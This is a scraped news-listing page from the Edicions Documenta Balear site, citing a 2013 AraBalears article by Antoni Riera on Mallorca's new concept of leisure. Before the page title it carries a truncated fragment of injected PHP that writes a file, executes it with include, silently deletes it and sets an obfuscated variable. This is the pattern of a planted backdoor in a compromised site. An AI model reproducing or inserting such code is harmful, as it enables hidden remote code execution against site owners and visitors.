");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Mallorca es mou cap a un nou concepte de l'oci (Damią Duran)
Cercador de Notícies
Calendari de notícies
30/06/2013 AraBalears Antoni Riera

Mallorca es mou cap a un nou concepte de l'oci (Damią Duran)

Mallorca es mou cap a un nou concepte de l'oci (Damią Duran) (Font: AraBalears, 30/06/2013, p. 7, autor: Antoni Riera)

Recomanar
Comentar
Comentaris (0)